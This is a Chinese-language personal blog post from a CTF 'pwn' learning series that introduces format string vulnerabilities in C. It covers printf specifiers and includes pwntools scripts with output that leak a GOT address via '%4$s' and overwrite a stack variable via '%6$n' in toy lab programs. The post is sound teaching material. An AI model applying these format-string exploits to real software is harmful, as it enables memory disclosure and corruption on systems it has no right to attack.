<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="什么是格式化字符串？这个问题我相信学过c语言的都不陌生，我们在使用printf一类（比如：sprintf、fprintf等）的函数时经常会用到这个东西，他的样子很好识别，一般就是%后面跟着一些字符，比如下面我们printf函数的第一个参数 #include&amp;lt;stdio.h&amp;gt; int main() {     printf(&amp;quot;this is a format string %s">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn学习（4）初识格式化字符串漏洞">
<meta property="og:url" content="http://yoursite.com/2018/11/19/pwn学习（4）初识格式化字符串漏洞/index.html">
<meta property="og:site_name" content="Asa9ao">
<meta property="og:description" content="什么是格式化字符串？这个问题我相信学过c语言的都不陌生，我们在使用printf一类（比如：sprintf、fprintf等）的函数时经常会用到这个东西，他的样子很好识别，一般就是%后面跟着一些字符，比如下面我们printf函数的第一个参数 #include&amp;lt;stdio.h&amp;gt; int main() {     printf(&amp;quot;this is a format string %s">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-11-19T13:54:16.189Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="pwn学习（4）初识格式化字符串漏洞">
<meta name="twitter:description" content="什么是格式化字符串？这个问题我相信学过c语言的都不陌生，我们在使用printf一类（比如：sprintf、fprintf等）的函数时经常会用到这个东西，他的样子很好识别，一般就是%后面跟着一些字符，比如下面我们printf函数的第一个参数 #include&amp;lt;stdio.h&amp;gt; int main() {     printf(&amp;quot;this is a format string %s">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/11/19/pwn学习（4）初识格式化字符串漏洞/">





  <title>pwn学习（4）初识格式化字符串漏洞 | Asa9ao</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Asa9ao</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/11/19/pwn学习（4）初识格式化字符串漏洞/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Asa9ao">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Asa9ao">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">pwn学习（4）初识格式化字符串漏洞</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-11-19T19:44:06+08:00">
                2018-11-19
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="什么是格式化字符串？"><a href="#什么是格式化字符串？" class="headerlink" title="什么是格式化字符串？"></a>什么是格式化字符串？</h1><p>这个问题我相信学过c语言的都不陌生，我们在使用printf一类（比如：sprintf、fprintf等）的函数时经常会用到这个东西，他的样子很好识别，一般就是%后面跟着一些字符，比如下面我们printf函数的第一个参数</p>
<pre><code>#include&lt;stdio.h&gt;
int main()
{
    printf(&quot;this is a format string %s&quot; , &quot;yes&quot;);
    return 0;
}
</code></pre><p>它主要是用一个说明符（在上面的例子中是s）来告诉程序该以何种格式来输出，而后为我们在输出中按格式填充入我们在后面的内容</p>
<p>下面是几个常见的说明符</p>
<pre><code>%d - 十进制 - 输出十进制整数
%s - 字符串 - 从内存中读取字符串
%x - 十六进制 - 输出十六进制数
%c - 字符 - 输出字符
%p - 指针 - 指针地址
%n - 到目前为止所写的字符数
</code></pre><p>这里前几个都是用来打印的，最后一个却是一个“异类”，这家伙的作用是写入到某个内存区域到现在为止写过的字符个数。注意要和%n$n区别开来，这个的作用是“选择”，举个例子讲，%3$s，这个的意思就是将第三个我们的填充物以%s的格式打印出来。<br>因为这些说明符的种种特性，我们可以使用它们来干一些“坏事”</p>
<h1 id="漏洞在哪？"><a href="#漏洞在哪？" class="headerlink" title="漏洞在哪？"></a>漏洞在哪？</h1><p>如果我想让你写一段代码打印出我输入的字符串你会怎么办？我相信大多数人会写出下面的代码：</p>
<pre><code>char str[100]
scanf(&quot;%s&quot;,str)
printf(&quot;%s&quot;,str)
</code></pre><p>代码看上去很简单嘛，但总有人喜欢偷懒，他会写成如下的形式：</p>
<pre><code>printf(str)
</code></pre><p>这就出问题了，一般的函数，传入的参数都是固定的，但printf却不同，因为它要求有一个format string，这个format string就是它的身家性命，这东西就决定了它后面有多少的参数，而就算是你的format string后面没有足够的参数，他也会认为“你有足够的参数”，然后自动读取栈上的数据，按照你的format打印出来。那我们就可以玩点有趣的东西了，我们先给出个程序（程序代码来自ctf wiki）</p>
<pre><code>#include &lt;stdio.h&gt;
int main() {
  char s[100];
  int a = 1, b = 0x22222222, c = -1;
  scanf(&quot;%s&quot;, s);
  printf(&quot;%08x.%08x.%08x.%s\n&quot;, a, b, c, s);
  printf(s);
  return 0;
}
</code></pre><p>可以看到这个程序就存在格式化字符串的漏洞。程序逻辑很简单，在我们输入s后，它先是“安全”的打印了s的内容，然后又直接打印了s，我们是这运行时输入这样一段数据</p>
<pre><code>AAAA%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x
</code></pre><p>然后我们就非（li）常（suo）惊（ying）讶（dang）的发现程序给我们输出这些内容：</p>
<pre><code>00000001.22222222.ffffffff.AAAA%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x
AAAAffff5160,c2,f7e036bb,41414141,252c7825,78252c78,2c78252c,252c7825,78252c78,2c78252c,252c7825
</code></pre><p>很显然程序把原本不用该暴露给我们的东西都吐了出来，而输出的第四部分41414141大家也应该很清楚，就是我们的AAAA</p>
<h1 id="泄漏任意内存地址"><a href="#泄漏任意内存地址" class="headerlink" title="泄漏任意内存地址"></a>泄漏任意内存地址</h1><p>通过前几次的学习我们知道了got表可是个好东西，当时我们想法设法的泄漏出got表内容进而拿到libc里面所有我们想要的东西。而通过这个漏洞我们可以非常轻松的实现got表的泄漏</p>
<p>还是以上面的程序为例，程序中存在scanf函数，那我们就泄漏这个函数的got表地址。</p>
<p>首先先看一下我们上面的测试，刚才的测试可不是仅仅为了演示漏洞，我们还可以看见程序给我们的的输出中41414141和我们的输入“AAAA”实际上是一样的，而41414141也就是第五个打印的部分，那也就是说，前面的我们实际上都不需要，我们借助上面调皮的%n就可以完美实现打印这个东西了。</p>
<p>话不多说，上脚本</p>
<pre><code>from pwn import *
sh = process(&apos;./leakmemory&apos;)
leakmemory = ELF(&apos;./leakmemory&apos;)
__isoc99_scanf_got = leakmemory.got[&apos;__isoc99_scanf&apos;]
print hex(__isoc99_scanf_got)
payload = p32(__isoc99_scanf_got) + &apos;%4$s&apos;
print payload
gdb.attach(sh)
sh.sendline(payload)
sh.recvuntil(&apos;%4$s\n&apos;)
print hex(u32(sh.recv()[4:8])) 
sh.interactive()

0x804a014
\x14\xa0\x0%4$s
[*] running in new terminal: /usr/bin/gdb -q  &quot;./leakmemory.dms&quot; 8086 -x &quot;/tmp/pwn2rdIM1.gdb&quot;
[+] Waiting for debugger: Done
0xf7de20c0
[*] Switching to interactive mode
</code></pre><p>成功拿到了scanf在got表中的地址</p>
<h1 id="覆盖内存"><a href="#覆盖内存" class="headerlink" title="覆盖内存"></a>覆盖内存</h1><p>那有了泄漏任意地址的方式，那我们有没有利用这个来实现覆盖地址呢？其实是可以的，这里我们要用到关于%n的知识，其实上面说过了，但还是再列一遍</p>
<p><strong>%n,不输出字符，但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。</strong></p>
<p>这里应该分两部分，但今天有点事耽搁了，所以就先简单的看看第一部分，栈上的内存覆盖吧，程序如下（依旧来自ctf wiki）</p>
<pre><code>/* example/overflow/overflow.c */
#include &lt;stdio.h&gt;
int a = 123, b = 456;
int main() {
  int c = 789;
  char s[100];
  printf(&quot;%p\n&quot;, &amp;c);
  scanf(&quot;%s&quot;, s);
  printf(s);
  if (c == 16) {
    puts(&quot;modified c.&quot;);
  } else if (a == 2) {
    puts(&quot;modified a for a small number.&quot;);
  } else if (b == 0x12345678) {
    puts(&quot;modified b for a big number!&quot;);
  }
  return 0;
}
</code></pre><p>简单看看，程序会输出变量c的地址，然后有个格式化字符串的漏洞，本来if判断c是不成立的，那我们就利用这个漏洞来改变c的值来让它符合。</p>
<p>首先还是用我们刚才的泄漏栈变量的方式（也就是上面的方法）确定偏移</p>
<pre><code>0xfff5de4c
AAAA%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x
AAAAfff5dde8,c2,f7e7a6bb,fff5de0e,fff5df0c,41414141,252c7825,78252c78,2c78252c,252c7825,78252c78
</code></pre><p>可以看到偏移是6，那我们就知道了payload最后应该是%6$n，我们的目标是让c变成16，我们一开始输入的是拿p32()处理过的c的地址，只有4位，还缺12位，我们就补个%012d，让程序随便打12个数据就好了，分析完毕，上脚本！</p>
<pre><code>from pwn import *
sh = process(&apos;./overwrite.dms&apos;)
c_addr = int(sh.recvuntil(&apos;\n&apos;, drop=True), 16)
print hex(c_addr)
payload = p32(c_addr) + &apos;%012d&apos; + &apos;%6$n&apos;
print payload
#gdb.attach(sh)
sh.sendline(payload)
print sh.recv()
sh.interactive()
</code></pre><p>successful！</p>
<p>那今天就先到这里了～明天估计会有格式化字符串的第二篇，以及栈溢出的更多的玩法，具体还是要看我的学习进度了</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/19/数据结构基础-顺序表/" rel="next" title="数据结构基础--顺序表">
                <i class="fa fa-chevron-left"></i> 数据结构基础--顺序表
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/11/20/pwn学习（5）格式化字符串漏洞2/" rel="prev" title="pwn学习（5）格式化字符串漏洞2">
                pwn学习（5）格式化字符串漏洞2 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Asa9ao</p>
              <p class="site-description motion-element" itemprop="description">It's not who I am underneath, but it's what I do that defines me</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#什么是格式化字符串？"><span class="nav-number">1.</span> <span class="nav-text">什么是格式化字符串？</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞在哪？"><span class="nav-number">2.</span> <span class="nav-text">漏洞在哪？</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#泄漏任意内存地址"><span class="nav-number">3.</span> <span class="nav-text">泄漏任意内存地址</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#覆盖内存"><span class="nav-number">4.</span> <span class="nav-text">覆盖内存</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Asa9ao</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
